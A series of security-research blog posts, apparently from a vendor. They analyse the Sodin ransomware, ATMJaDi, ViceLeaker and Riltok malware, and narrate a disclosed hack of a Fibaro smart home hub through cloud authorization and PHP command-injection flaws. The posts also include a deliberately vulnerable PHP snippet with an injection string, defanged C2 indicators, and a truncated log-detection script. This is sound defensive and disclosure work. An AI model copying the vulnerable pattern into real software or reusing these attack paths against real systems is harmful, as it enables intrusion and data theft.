The encrypted files receive a new arbitrary extension (the same for each infection case), the ransom note is saved next to them, and the malware-generated wallpaper is set on the desktop.

Cybercriminals’ demands

Fragment of the desktop wallpaper created by the ransomware

Network communication

If the corresponding flag is set in the configuration block, the Trojan sends information about the infected machine to its servers. The transmitted data is also encrypted with the ECIES algorithm using yet another hardcoded public key.

Part of the Sodin configuration responsible for network communication

Field: Purpose
  • ver: Trojan version
  • pid: probably distributor ID
  • sub: probably campaign ID
  • pk: distributor public key
  • uid: infection ID
  • sk: sk_key value (see description above)
  • unm: infected system username
  • net: machine name
  • grp: machine domain/workgroup
  • lng: system language
  • bro: whether the language or layout is on the list (below)
  • os: OS version
  • bit: architecture
  • dsk: information about system drives
  • ext: extension of encrypted files

During the execution process, the Trojan checks the system language and available keyboard layouts:

If a match is found in the list, the malware process terminates without sending statistics.

MITRE ATT&CK techniques


More information about Kaspersky cybersecurity services can be found here: https://www.kaspersky.com/enterprise-security/cybersecurity-services




1 July 2019

How we hacked our colleague’s smart home

In this article, we publish the results of our study of the Fibaro Home Center smart home. We identified vulnerabilities in Fibaro Home Center 2 and Fibaro Home Center Lite version 4.540, as well as vulnerabilities in the online API.

An offer you cannot refuse

The backbone of any technology company is made up of tech enthusiasts – people who eat, sleep, and breathe it, whose passion for experimenting, including on personal devices, leads them to interesting results. The idea for this study was suggested to us by a colleague of ours, a system administrator in the past and now vice-president of the company. Fibaro Home Center was installed at his home, and he kindly gave us permission to dissect it.

Fibaro is a rather unique company in some ways. It started operating in 2010, when IoT devices were not yet widespread. Today, the situation is different. According to IDC, in just a few years the number of IoT devices will hit almost one billion. Fibaro Group’s plant in Poland already makes about one million different devices a year – from smart sockets, lamps, motion sensors, and flood sensors to devices that directly or indirectly influence the security of homes fitted with them. Moreover, sales of Fibaro devices for 2018 in Russia grew by almost 10 times against 2017. The company clearly plays a significant role in the IoT device market, so a study of Fibaro smart home security is very timely indeed. And when our colleague offered his home as a guinea pig, we could hardly say no.

It is our hope that this article will attract more researchers to the world of IoT, since the growing army of IoT devices requires ever more resources to analyze them. We also hope that the results of our research will catch the eye of companies that produce IoT devices, since errors like the ones we found are best addressed at the code audit and device testing stages.

The challenge we thus faced was to attack the system of someone we knew. On the one hand, this simplified the task, because we did not have to prepare a test bed (the system includes a fairly wide range of different devices). Yet on the other, it complicated it, because the host knew about the impending attack, and had every opportunity to secure his home against the “intruders.”

Potential attack vectors

Before examining the vulnerabilities detected, we will describe our analysis of the attack surface of the Fibaro smart home and consider each of the attack vectors.

Reconnaissance stage

Just like real cybercriminals, we started with a little intelligence and information gathering from open sources.

Smart home equipment is rather expensive, but there is no need to own a specific device to get the required information about it, since Fibaro publishes extensive details of its devices online. The FAQ section on the company’s website provides some interesting facts. For example, Home Center can be managed directly from home.fibaro.com or even via SMS. So clearly, when Internet access is available, the system connects to, and can be controlled through, the cloud.

The website also divulges that Home Center manages Fibaro devices using the Z-Wave protocol. This protocol is often used to automate home processes, as it has greater range than Bluetooth and lower power consumption than Wi-Fi.

Another tidbit is that if the network already has some kind of smart device that does not belong to Fibaro (for example, an IP camera), Fibaro provides various plug-ins to integrate the device into a single complex and manage it from Home Center.

Our colleague greatly simplified our task by providing a static IP address through which we could reach the admin panel login form.

Admin panel login form

A scan revealed that only one externally reachable port was open at this IP address, and it was forwarded on the router to the Fibaro Home Center admin panel. All other ports were blocked. The presence of an open port goes against Fibaro’s security recommendations (see item 10). However, if our colleague had used a VPN to access Home Center, the lack of any entry point from which to start the analysis would have ended our study before it had begun.

Perimeter overview

At the reconnaissance stage, information from open sources (more precisely, from Fibaro’s official website) was sufficient to piece together several attack vectors that could be used against our colleague’s home.

Attack via Z-Wave

This attack can be carried out in the immediate vicinity of the device. The intruders need to reverse-engineer the code of the Z-Wave communication module, for which they need to be within range of a device operating on the Z-Wave protocol. We did not go down this route.

Attack via the admin panel web interface

As already noted, the smart home system has an admin panel for device management. This means that there is some kind of backend and data storage on the device in question. Most often, due to the limited RAM and persistent memory in embedded and IoT devices, the server role is performed by PHP or CGI (which run alongside a lightweight web server), while the file system or a file database (for example, SQLite) acts as the storage. Sometimes, the server-side logic is wholly processed by a web server that takes the form of a compiled binary ELF file. In our case, the software stack consisted of PHP, Lua, nginx, a C++ server, and lighttpd, while data was stored in both an SQLite database and a special section of the file system.

The fact that the admin panel operates through an API written in PHP encouraged us to continue this line of enquiry. To investigate the admin panel for vulnerabilities using white-box testing at this stage, we had to get the admin panel source code and the firmware of the smart home itself. This would provide a clearer understanding of its architecture and the structure of the logical processes inside it, such as scanning and downloading/installing updates.

Attack via the cloud

This type of attack can be carried out in two ways:

  1. By attempting to gain access to a device via the cloud while already having access to a similar Fibaro device,
  2. By attempting to gain access to the cloud without access to any Fibaro device.

This vector implies testing the software logic, which is often located on the vendor’s servers. As we found out at the reconnaissance stage, Home Center can be managed through home.fibaro.com, a mobile app, or SMS. Even if you do not have a static IP address, your device will be accessible from the Internet. This means that the device connects to a server (most likely the vendor’s), which can allow the attacker to gain access to another smart home through the vendor’s common network.

The differences between (1) and (2) will become apparent when we examine the device architecture in more detail. At this stage, suffice it to know that we need to somehow collect data about what common functionality the devices have in terms of the cloud.

File system image analysis

Let’s skip the description of how we found the image of the file system for the required device (we describe different ways of getting device firmware with examples as part of our IoT/embedded device vulnerability search training).

Our examination of the file system turned up some interesting facts.


The web server has a fully documented API that describes methods, parameter names, and the values they can take in a request. However, it turned out that to get any significant information, it was necessary to log into the admin panel.

The only information that can be obtained without authorization is the device serial number.

Access to the documented API through the web interface

Also, it can be seen in the nginx web server configuration file that some requests are proxied to a local server written in C++, and some are proxied to lighttpd, which executes PHP code using mod_cgi. These PHP request handlers are called “services”.

Simplified nginx server configuration


As already stated, the majority of API requests are handled by a C++ binary server. However, for unexplained reasons, the developers singled out part of the logic (rebooting the device, restoring factory settings, creating a backup copy, and much more) and wrote it in PHP.

The web server written in C++ accepts all requests via nginx, and we have no direct access to it. This significantly narrows the attack surface for this web server: we cannot send it arbitrary HTTP requests directly.

Therefore, the part of the logic written in PHP is of great interest to us, since it is just about the only entry point for a possible attack.

Serial number and hardware key

Each device has a serial number and a hardware key, which are used to authorize it in the cloud. Each time a device wants to perform an action that is somehow connected to the cloud (for example, send an SMS or email to the device owner, upload a backup copy to the cloud, download a backup copy), the device sends an HTTP request to the server with the serial number and hardware key as parameters. These are checked in the cloud for compliance in the database. If authorization is successful, the action is executed.

As we already know, the serial number is not secret: It is fairly easy to get by means of an API request. Moreover, the number is not long. The serial numbers we encountered correspond to the regular expression (HCL|HC2)-(\d{6}), which is a small enough space to brute-force.

The hardware key, meanwhile, is secret and individual for each device; it is stored in a special section of the file system that is mounted during device bootup.

However, only the device serial number is used for scanning and checking for updates. This makes it quite straightforward to download any update from the cloud by serial number.

Threat of hardware key theft

A device that stores personal user data must be made as secure as possible against intrusion. To increase the level of protection, device developers sometimes deprive the owner of superuser rights in the system. In this case, the owner becomes an ordinary, non-privileged user able to perform only actions allowed by the developers. Sometimes, however, this approach does not work, because if the owner wants to tweak or fix something in the device (for example, a vulnerability in the phone’s code), they will not be able to do it independently. They will need assistance from the device developers, who can release an update with a fix, but not as quickly as one would like. Therefore, an alternative approach involves developers giving owners superuser rights, together with the responsibility for their use.

Both approaches have their strengths and weaknesses, and the question of which is better is a good topic for debate, but not today.

Fibaro’s developers decided not to give Home Center owners superuser rights and extra responsibility. Therefore, we viewed options to elevate privileges in the system from the admin panel as full-fledged vulnerabilities.

In the threat model we built for Fibaro Home Center, the priority is to protect the hardware key. The device has a function for sending notifications to the smart home owner in the event that their participation is needed to resolve issues reported by smart home equipment. Any hardware key owner can send messages, and the list of recipients whom the owner of a particular hardware key can contact is not controlled in any way.

Messages from the cloud come from the address SERIAL_NUMBER@fibaro.com, where SERIAL_NUMBER is the serial number of the owner’s device. It can be assumed that not all device owners remember their Home Center serial number, or are vigilant enough to check it. They are likely not to notice a substituted serial number in the sender’s address; the fact that the message was sent from the @fibaro.com server will be enough, and they will perform the actions recommended in the message.

Since the problem of extracting the hardware key from the device’s persistent memory is in most cases a question of time, it might be an idea for developers to change the mechanism for sending messages and SMS.


In the Fibaro Home Center admin panel, it is possible to create “scenes” – behavior scenarios composed of blocks or scripts written in the Lua programming language that are executed under specified conditions.

Lua provides the option to create an isolated environment in which the programmer can execute arbitrary scripts in Lua without going beyond it. The language is also known for having various vulnerabilities that make it possible to escape from this isolated environment. A good example is a recently discovered vulnerability in Lua 5.0.3 in the bytecode verifier module, which formed the basis of a CTF challenge. In the description, the author states that the vulnerability was originally exploited on a “VPN SSL device” that they were investigating as part of their work.

Unfortunately, we were out of luck: On the device that we examined, a newer version (5.2) of the Lua interpreter without the bytecode verifier module was installed, and none of the known simple methods of escaping from the Lua sandbox was available. In our case, the task of finding vulnerabilities in the isolated environment was reduced to searching for vulnerabilities directly in the Lua interpreter. This task is quite time-consuming, so we decided it would be irrational to pursue this vector.

Lua isolated environment


Many plug-ins for Fibaro Home Center can be used to manage devices that may not belong to Fibaro. This feature adds a very interesting research vector: Can a cybercriminal with access to a device controlled by Home Center through plug-ins attack Home Center and gain access to it? Within the framework of this study, we decided to postpone work on this vector and focus instead on vulnerabilities more likely to bear fruit.

Cloud communication

To communicate with the cloud, the device performs several steps:

  • It gets the IP address and port to which it should connect,
  • It establishes an SSH connection with the server,
  • It forwards SSH port 22 to the specified port.

Thus, the Fibaro control center can connect to Home Center via a cloud server using a private SSH key to execute any command sent by the home owner, for example, by SMS or via the website.

Authentication nuances

An administrator password salt was not individually generated for each device, but strictly defined in the PHP code. If an attacker wanted to gain access to all Fibaro devices, their goal would be made a lot easier as a consequence. The cybercriminal could download all saved backup copies of all Fibaro smart home users, and then find identical hashes corresponding to identical passwords. The most common password matching the most frequently occurring hash could be brute-forced.

The scenario whereby an attacker builds rainbow tables for a given salt is possible in a targeted attack against all users of Fibaro systems. This is another argument in favor of generating an individual salt for each device.

Vulnerability scan

The first thing we looked at during our study was the part of the API implemented in PHP.

It would have been very interesting for us to test the methods that lay behind login, but without the ability to sign in, this research vector would not have yielded any results, since we could not call the methods we needed.

We investigated practically the only entry point available to us, and found nothing. It seemed that the study had reached a dead end, but then we decided to study the attack vector via the cloud.

Access to the cloud through which the smart home is managed (i.e. home.fibaro.com) was also unavailable to us, so we could only collect information about the cloud from scripts on the device that accessed it. As a rule, requests to the cloud were made from the device using the command-line tool cURL. Of all the requests, the most interesting were those for uploading backup copies to the cloud and downloading them from the cloud to the device.


After testing the cloud methods for processing requests from the device, we discovered a vulnerability linked to an authorization error allowing an intruder to list the backup copies of any user, upload backup copies to the cloud, and download them without having any rights in the system.

This problem occurred in the PHP code most likely as a result of incorrectly processing a scenario in which the passed value of the hardware key was set to null.

We rated this vulnerability as critical because it allowed access to all backup copies that were uploaded to the cloud from all Fibaro Home Centers. As will be shown later, using a backup copy and a remote code execution vulnerability in the admin panel, it is possible to gain full control over Home Center without interacting with the owner.

Remote code execution

Several remote code execution vulnerabilities were related to weak implicit typing in PHP. Let’s consider a simplified PHP code snippet in which we found a vulnerability:

Simplified PHP code snippet

On Fibaro devices, a significant part of device management is implemented using bash scripts, which in turn invoke command-line utilities for direct execution of the required actions in the system. Some of these executable scripts are invoked directly from the PHP code using the exec command. Since in the above snippet the user-controlled parameter is subsequently included in the command-line arguments, it needs to be filtered. If it is not possible to avoid executing bash scripts, the best solution is to not interpret this line in the bash shell and to run this command in an execve()-style way through the pcntl_exec function. However, due to the weak typing in PHP, and the fact that $_GET['parameter_name'] necessarily takes a string value, this parameter can be equal to 1234some_data_here_or_may_be_code_injection, in which case it will still pass the if($parameter_value>0) check. Thus, the exploitation of this vulnerability made it possible to execute code remotely from the admin panel and gain root access on the device.
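The following is an added illustration, not Fibaro’s code: the weak-typing check described above next to a hardened variant that validates the value as an integer and executes the helper script without a shell. The script path and the parameter name are hypothetical.

```php
<?php
// Added example (not Fibaro's code). Script path and parameter name are hypothetical.

// Vulnerable pattern: the comparison looks numeric but does not prove the value
// is an integer. $_GET values are always strings, and PHP's comparison of a
// leading-numeric string such as "1234some_data_here_or_may_be_code_injection"
// with the int 0 evaluates to true (numerically in PHP 7, as a string
// comparison "1..." > "0" in PHP 8).
function build_command_vulnerable(array $get): ?string
{
    $parameter_value = $get['parameter_name'] ?? '';
    if ($parameter_value > 0) {
        // The untrusted string is interpolated into a shell command line, so any
        // shell metacharacters it contains are interpreted by /bin/sh.
        return "/opt/fibaro/scripts/action.sh $parameter_value"; // hypothetical path
    }
    return null;
}

// Hardened step 1: accept only a canonical decimal integer within a range.
// FILTER_VALIDATE_INT rejects "1234abc", "1e3", "0x10" and, via min_range, "0"/"-1".
function parse_positive_int(string $raw, int $max = 86400): ?int
{
    $value = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => $max],
    ]);
    return $value === false ? null : $value;
}

// Hardened step 2: never hand the value to a shell. Given an argv array,
// proc_open() (PHP >= 7.4) executes the program directly, execve()-style.
// This follows the same idea as the pcntl_exec() approach mentioned above,
// but without replacing the web server's worker process.
function build_argv_hardened(array $get): ?array
{
    $delay = parse_positive_int((string)($get['parameter_name'] ?? ''));
    if ($delay === null) {
        return null; // reject the request instead of guessing at a value
    }
    return ['/opt/fibaro/scripts/action.sh', (string)$delay]; // hypothetical path
}

// Runs an argv array without shell interpretation and returns its stdout.
function run_argv(array $argv): string
{
    $proc = proc_open($argv, [1 => ['pipe', 'w'], 2 => ['pipe', 'w']], $pipes);
    if (!is_resource($proc)) {
        return '';
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    return $out;
}

// Constructed request: the injected string passes the weak check in
// build_command_vulnerable() but is rejected by build_argv_hardened().
$request = ['parameter_name' => '1234some_data_here_or_may_be_code_injection'];
var_dump(build_command_vulnerable($request) !== null);
var_dump(build_argv_hardened($request));
var_dump(build_argv_hardened(['parameter_name' => '30']));
```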

SQL injection

We also detected several problems associated with the injection of SQL code.

With the development of smart home software, the introduction of new components and dependencies is inevitable. Yet at the same time, they have to fit into memory of very limited size. As a result, developers have to question the need for each new file in the system so as to avoid the future cost of a larger memory in every device. Therefore, developers of embedded devices often try to reduce, as far as possible, the number of executable files and libraries installed on the device. This is probably why Home Center did not have a library for interaction between SQLite and PHP, which could have eliminated SQL injection errors by design through prepared statements.

Simplified code sample containing an error

As can be seen in the screenshot, the system developers wanted to avoid SQL injections through the use of a very interesting filtration technique involving the duplication of quotes in the query, and a no less unusual method of accessing the database by running the sqlite3 tool from the command line. However, such filtering turned out to be insufficient because the quotes can still be escaped using a backslash in the first parameter. If such a backslash is inserted, it leads to a breakout from the string context in the second parameter and potential SQL injection in the database query.

In versions older than 4.540, all database queries were modified and securely rewritten using prepared statements.

The “Attack”

Using the vulnerability identified, we managed to retrieve a backup copy from our colleague’s device, in which only one file was of interest to us: the SQLite database file. A careful examination of this file showed it to contain a lot of valuable information:

  1. Our colleague’s password in cached form with an added salt
  2. The precise coordinates of the home where the device was located
  3. The geolocation of our colleague’s smartphone
  4. Our colleague’s email addresses used for registration in the Fibaro system
  5. All data about IoT devices (including ones not belonging to Fibaro) that were installed by our colleague at home, with device model, username/password in text form, IP addresses of devices in the internal network, etc.

Note that storing passwords for Fibaro Home Center-integrated IoT devices in text form allows an attacker with access to the Home Center and the SQLite database to gain access to all other devices in the home.

An offline attempt to brute-force our colleague’s password led nowhere, and none of the passwords for the other devices in the home worked for the Home Center control panel. However, we would have been very surprised if such a simple attack had produced a result. As a company, we regularly emphasize the need to use strong unique passwords for each device or service.

If we could have recovered the password from the hash using brute force, or if one of the passwords for the other devices had worked, we could have got inside the Home Center control panel. Then, to elevate privileges in the system, we would have needed to exploit the remote code execution vulnerability described above. To gain access to the device in this case, the owner’s participation would not have been required. But we had to take a different route.

We created a special backup copy in which we placed a password-protected PHP script that could execute any command of ours. After that, using the relevant cloud functionality, we sent an email and an SMS to our colleague asking him to update the software on the device by downloading from the cloud the backup copy that we had prepared.

Our colleague knew straight away that these messages were sent by us. First, he had been expecting an “attack,” and second, our email did not match the standard format used by Fibaro. However, an ordinary user unaware that their smart home is being hacked might not spot the difference in format. As such, our colleague decided to continue the experiment and installed the backup copy.

The web server for executing PHP scripts was run on the device with superuser rights. So after the backup copy was installed by the device owner, we gained access to the smart home with maximum privileges.

Naturally, being decent and responsible people, we did not take any harmful actions in our colleague’s home – with the exception of changing the melody on his alarm clock to indicate our presence. The following morning, our colleague awoke to the soothing tones of drum & bass.

But unlike us, a real attacker with access to Home Center is unlikely to just fool around with the alarm clock. One of the main tasks of the device we investigated is to integrate all smart things so that the home owner could manage them from Home Center itself. A “smart thing” here can be not just a light bulb or kettle, but vital safety equipment: for example, alarms, window/door/gate opening and closing mechanisms, surveillance cameras, heating/air conditioning systems, etc. The havoc a villain could wreak in this situation is the stuff of horror movies, not this article.


In the course of this study, we were able to gain potential access through the cloud to all Fibaro Home Centers by uploading and downloading backup copies, as well as full root access to our colleague’s smart home.

We uncovered critical vulnerabilities on the device itself and in the cloud service. Our findings were reported to Fibaro Group, after which all the vulnerabilities were successfully eliminated.

We wish to thank Fibaro Group for this successful cooperation, and hope that we have helped to improve the security of their flagship product.

Currently, smart home nightmares are confined to horror movie screenplays, but they could soon become a terrifying reality if we do not take sufficient care over what we make and use.




27 June 2019

Criminals, ATMs and a cup of coffee

In spring 2019, we discovered a new ATM malware sample written in Java that was uploaded to a multiscanner service from Mexico and later from Colombia. After a brief analysis, it became clear that the malware, which we call ATMJaDi, can cash out ATMs. However, it does not use the standard XFS, JXFS or CSC libraries. Instead, it uses the victim bank’s proprietary Java ATM software classes, meaning the malware will only work on a small subset of ATMs. This makes the malware very targeted.

Kaspersky products detect the sample as Trojan.Java.Agent.rs.

Technical Details

First, as with most other ATM malware, the attackers must find a way to install the malware on the target ATMs. The malware can’t be controlled via the ATM keyboard or touchscreen, because it runs a self-crafted HTTP server web interface for its purpose. So the criminals must have network access to the target ATM. This makes us believe that the criminals have compromised the bank’s infrastructure to gain access to the network that the ATMs are connected to.

Once installed and executed, the malware, in the form of a Java archive file called “INJX_PURE.jar”, looks for the process that controls the ATM and injects itself into it, giving it control of the legitimate ATM process. After injection, the malware prints a message on the terminal simultaneously in several languages: Russian, Portuguese, Spanish and Chinese. However, all the other messages or strings used by the malware are in English. The different language phrases shown in the output can be translated into English as “Freedom and glory”. This is followed by the additional Russian message “отдельный”, which means “separate”. We believe this might be a false flag, because native Russian speakers would never use this word in this context.

  • Свобода и слава
  • Liberdade e glória
  • Libertad y gloria
  • 自由与荣耀
  • отдельный

Next, an HTTP server is started that accepts commands using predefined URL paths. They are:

  • /d to dispense or to get the ATM cassette to carry out actions (the proper action is determined by the passed parameters);
  • /eva to evaluate (run) user-supplied code on the victim ATM;
  • /mgr for the manager, which gives criminals access to a list of all running classes for the attached Java virtual machine, so that they can call any function they desire, supplying the arguments if needed;
  • /core allows the criminals to load a specified .jar file from the victim file system;
  • /root accepts a POST request body and passes it as a shell command to cmd.exe, returning the resulting output.

The dispensing and “run a shell” paths do not have an interface page with forms and buttons; instead, they only accept pre-prepared HTTP POST requests and print the raw text results to a page, omitting HTML tags. So, in the case of the dispensing request, the malware response will be the ‘ok’ string. The “get cash units information” request will be followed by a string describing the status of the ATM’s cash units (see the example below).


This string consists of four groups separated by semicolons. Each group corresponds to one ATM cash cassette and consists of two values separated by a colon: the denomination and the actual number of bills in the cassette. In the example above, the first cassette has 1000 banknotes of denomination 1, 700 banknotes of denomination 5, etc.

Unlike the “run a shell”, “dispense” and “get cash unit” paths, the “eva”, “mgr” and “core” paths have interface pages. Below is a screenshot of the evaluation page:

/eva path interface example screenshot

It allows the criminals to paste and run any JavaScript code on a victim ATM and see what it returns. Why JavaScript? Because Java allows the use of external engines, and the criminals used a JavaScript one. Below is the function that the malware uses to run the passed JavaScript code.

Malware sample code that can evaluate JavaScript


The targeted nature of ATMJaDi shows that the criminals studied the victim very well before writing their malware. It’s clear that they must have had access to an ATM where the custom Java classes were running and most likely to the Java program source code as well.

Also, the way the malware can be controlled shows that the criminals planned to gain network access to the infected ATM, most likely through the bank’s internal network.

What banks can do to prevent these types of attacks:

  • Set up special anti-targeted attack solutions such as KATA (Kaspersky Anti Targeted Attack Platform) to protect the bank’s network and other solutions to protect ATMs from malware;
  • ATM file whitelisting;
  • The bank ATM network has to be isolated and access to it must be highly restricted;

This is not a complete list of actions: the issue of information security requires constant attention and action.

26 June 2019

ViceLeaker Operation: mobile espionage targeting the Middle East

In May 2018, we discovered a campaign targeting dozens of mobile Android devices belonging to Israeli citizens. Kaspersky Lab spyware sensors caught the signal of an attack from the device of one of the victims, and a hash of the APK (Android application package) involved was tagged in our sample feed for inspection. Once we looked into the file, we quickly found out that the inner workings of the APK included a malicious payload, embedded in the original code of the application. This was an original spyware program, designed to exfiltrate almost all accessible information.

Spyware sensors samples feed contained the first sample

During the course of our research, we noticed that we were not the only ones to have found the operation. Researchers from Bitdefender also released an analysis of one of the samples in a blogpost. Although something had already been published, we decided to do something different with the data we acquired. The following month, we released a private report on our Threat Intelligence Portal to alert our clients about this newly discovered operation and began writing YARA rules in order to catch more samples. We decided to call the operation “ViceLeaker”, because of strings and variables in its code.

Mobile ViceLeaker

The following table shows meta information on the observed samples, including compiler timestamps:

MD5                               Package                     Compiler    C2
51df2597faa3fce38a4c5ae024f97b1c  com.xapps.SexGameForAdults  dexlib 2.x  188.165.28[.]251
2d108ff3a735dea1d1fdfa430f37fab2  com.psiphon3                dexlib 2.x  188.165.49[.]205
7ed754a802f0b6a1740a99683173db73  com.psiphon3                dexlib 2.x  188.165.49[.]205
3b89e5cd49c05ce6dc681589e6c368d9  ir.abed.dastan              dexlib 2.x  185.141.60[.]213

To backdoor legitimate applications, the attackers used a Smali injection technique – a type of injection in which the attackers disassemble the code of the original app with the Baksmali tool, add their malicious code, and assemble it again with Smali. As a result of this unusual compilation process, there were signs in the dex file that point to dexlib, a library used by the Smali tool to assemble dex files.

Original code of the APK on the left, versus injected APK on the right

The analysis of the APK was rather interesting, because some of the actions were very common spyware features, such as the exfiltration of SMS messages, call logs and other data. However, in addition to the traditional functionality, there were also backdoor capabilities such as upload, download, delete files, camera takeover and record surrounding audio.

The malware uses HTTP for communication with the C2 server for command handling and data exfiltration. Here is a command and control protocol fragment:

Commands from C2 server parsing

In total, the malicious APK handles 16 different commands:

Command  Endpoint        Description
1        reqsmscal.php   Send specified SMS message
2        reqsmscal.php   Call specified number
3        reqsmscal.php   Exfiltrate device info, such as phone model and OS version
4        reqsmscal.php   Exfiltrate a list of all installed applications
5        reqsmscal.php   Exfiltrate default browser history (limited to a given date)
6        reqsmscal.php   Exfiltrate Chrome browser history (limited to a given date)
7        reqsmscal.php   Exfiltrate memory card file structure
8        reqsmscal.php   Record surrounding sound for 80 seconds
1        reqcalllog.php  Exfiltrate all call logs
2        reqcalllog.php  Exfiltrate all SMS messages
3        reqcalllog.php  Upload specified file from the device to the C2
4        reqcalllog.php  Download file from specified URL and save on device
5        reqcalllog.php  Delete specified file
6,7,8    reqcalllog.php  Commands not yet implemented
9        reqcalllog.php  Take photo (muted audio) with rear camera, send to C2
10       reqcalllog.php  Take photo (muted audio) with front camera, send to C2

All observed samples with Smali injections were signed by the same debug certificate (0x936eacbe07f201df).

As we know from our investigation, traces of the first development activities were found at the end of 2016, but the main distribution campaign began in 2018 (end of 2017).

Based on our detection statistics, the main infection vector is the spread of Trojanized applications directly to victims via the Telegram and WhatsApp messengers. The following detection paths are relevant (the last one belongs to an alternative Telegram client, “Telegram X”):

Name                        Detection path
Sex Game For Adults 18.apk  /storage/emulated/0/WhatsApp/Media/WhatsApp Documents/
4_6032967490689041387.apk   /storage/emulated/0/Telegram/Telegram Documents/
Psiphon-v91.apk             /storage/emulated/0/Android/data/org.thunderdog.challegram/files/documents/

Backdoored Open Source

During the course of our analysis, we also found samples sharing code with the ViceLeaker malware, in particular they shared a delimiter that was used in both cases to parse commands from the C2 server.

Modified Conversations (on the right) code overlap with the Smali injections (left)

This would be a very unusual coincidence. Even when a false flag might also be a possibility, we consider this to be unlikely.

The samples sharing this overlap are modified versions of an open source Jabber/XMPP client called “Conversations” with some code additions. The legitimate version of this app is also available on Google Play.

Screenshot of Conversations app on Google Play

The Conversations modified samples differ from the original one in the getKnownHosts method that was modified to replace the main XMPP host with the attackers’ C2 server:

Comparison of the original “getKnownHosts” method (from Github) and the modified one

It appears that the attackers were using a specific C2 for the use of that app. Another important modification is in the message transfer process:

Comparison of the original Conversations method with the modified one

With this modification, an application sends device location coordinates with every message.

There are also many other modifications, fully described in our private report. In addition, we did not see traces of the Smali injection. In this case we found traces of dx/dexmerge compilers, which means that, this time, the attackers just imported the original source code into an Android IDE (such as Android Studio, for instance) and compiled it with their own modifications.

dx/dexmerge compiler of the modified Conversations samples

In addition to adding the code, the attackers also changed the icon and package name. We do not know why, but we suspect that it was an attempt to hide the origin of the application.

Conversations-based app mimics Telegram messenger

Although we originally thought this was a backdoored version of the Conversations app, used to infect victims, we did not discover anything malicious in it. This led us to the hypothesis that this might be a version used by the group behind ViceLeaker for internal communication or for other, unclear purposes. All the detections of this backdoored app were geolocated in Iran.

Backdoored Conversations C2 server analysis

During the analysis of the Smali-injected apps and their C2 server infrastructure we had not found any interesting clues, but things changed when we looked at the C2 server of the linked Conversations messenger. It uses “185.51.201[.]133” as its main C2 address, and there is only one domain hosted on this dedicated server – iliageram[.]ir. Note that we later found versions that used the domain directly as the C2 instead of the IP address. The record contains a personal email address:

WHOIS records of C2 server exposing the attacker’s email address

We were aware of the possibility that the attackers might be using a compromised email account, so we dug deeper to find more information related to this email address. A quick search produced results about a personal page and, what is more interesting, a GitHub account that contains a forked Conversation repository.

Related Github account contains forked Conversations repository

Summarizing all the found clues, we have the following attribution flow:


The ViceLeaker operation is still ongoing, as is our research. The attackers have taken down their communication channels and are probably looking for ways to assemble their tools in a different manner. Kaspersky Lab detects and blocks samples of the ViceLeaker operation using the following verdict: Trojan-Spy.AndroidOS.ViceLeaker.*

We are also currently investigating whether this group might be behind a large-scale web-oriented attack at the end of 2018 that used code injection and exploited SQL vulnerabilities. Even if this is not directly related to the Android malware described in this blogpost, it would be an indicator of the wider capabilities and objectives of this actor.

For more information about the ViceLeaker operation, contact us at: intelreports@kaspersky.com

25 June 2019

Riltok mobile Trojan: A banker with global reach

Riltok is one of numerous families of mobile banking Trojans with standard (for such malware) functions and distribution methods. Originally intended to target the Russian audience, the banker was later adapted, with minimal modifications, for the European “market.” The bulk of its victims (more than 90%) reside in Russia, with France in second place (4%). Third place is shared by Italy, Ukraine, and the United Kingdom.

Geographic spread of the Riltok banking Trojan

We first detected members of this family back in March 2018. Like many other bankers, they were disguised as apps for popular free ad services in Russia. The malware was distributed from infected devices via SMS in the form “%USERNAME%, I’ll buy under a secure transaction. youlabuy[.]ru/7*****3” or “%USERNAME%, accept 25,000 on Youla youla-protect[.]ru/4*****7”, containing a link to download the Trojan. Other samples were also noticed, posing as a client of a ticket-finding service or as an app store for Android.

It was late 2018 when Riltok climbed onto the international stage. The cybercriminals behind it kept the same masking and distribution methods, using names and icons imitating those of popular free ad services.

Icons most frequently used by the Trojan: Avito, Youla, Gumtree, Leboncoin, Subito

In November 2018, a version of the Trojan for the English market appeared in the shape of Gumtree.apk. The SMS message with a link to a banker looked as follows: “%USERNAME%, i send you prepayment gumtree[.]cc/3*****1”.

Italian (Subito.apk) and French (Leboncoin.apk) versions appeared shortly afterwards in January 2019. The messages looked as follows:

  • “%USERNAME%, ti ho inviato il soldi sul subito subito-a[.]pw/6*****5” (It.)
  • “% USERNAME%, ti ho inviato il pagamento subitop[.]pw/4*****7” (It.)
  • “%USERNAME%, je vous ai envoyé un prepaiement m-leboncoin[.]top/7*****3” (Fr.)
  • “%USERNAME%, j’ai fait l’avance (suivi d’un lien): leboncoin-le[.]com/8*****9” (Fr.)

Let’s take a more detailed look at how this banking Trojan works.


The user receives an SMS with a malicious link pointing to a fake website simulating a popular free ad service. There, they are prompted to download a new version of the mobile app, under which guise the Trojan is hidden. To be installed, it needs the victim to allow installation of apps from unknown sources in the device settings.

During installation, Riltok asks the user for permission to use special features in AccessibilityService by displaying a fake warning:

If the user ignores or declines the request, the window keeps opening ad infinitum. After obtaining the desired rights, the Trojan sets itself as the default SMS app (by independently clicking Yes in AccessibilityService), before vanishing from the device screen.

After enabling AccessibilityService, the malware sets itself as the default SMS app

Now installed and having obtained the necessary permissions from the user, Riltok contacts its C&C server.

In later versions, when it starts, the Trojan additionally opens a phishing site in the browser that simulates a free ad service so as to dupe the user into entering their login credentials and bank card details. The entered data is forwarded to the cybercriminals.

Phishing page from the French version of the Trojan

Communication with C&C

Riltok actively communicates with its C&C server. First off, it registers the infected device in the administrative panel by sending a GET request to the relative address gate.php (in later versions gating.php) with the ID (device identifier generated by the setPsuedoID function in a pseudo-random way based on the device IMEI) and screen (shows if the device is active, possible values are “on”, “off”, “none”) parameters.

Then, using POST requests to the relative address report.php, it sends data about the device (IMEI, phone number, country, mobile operator, phone model, availability of root rights, OS version), list of contacts, list of installed apps, incoming SMS, and other information. From the server, the Trojan receives commands (for example, to send SMS) and changes in the configuration.
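One way a defender can hunt for the check-in sequence described above in web-server or proxy access logs. This is an added example, not Kaspersky's code; the parameter names `id` and `screen` and the log lines are constructed assumptions, since the write-up only names the parameters as ID and screen.

```python
"""Spot Riltok-style check-in traffic in an HTTP access log.

Added example, not Kaspersky's code. It follows the beacon pattern described
above: a GET to gate.php or gating.php carrying a device ID and a `screen`
parameter (on/off/none), followed by POSTs to report.php. The parameter names
`id` and `screen` and the log lines below are constructed assumptions.
"""
import re
from urllib.parse import parse_qs, urlsplit

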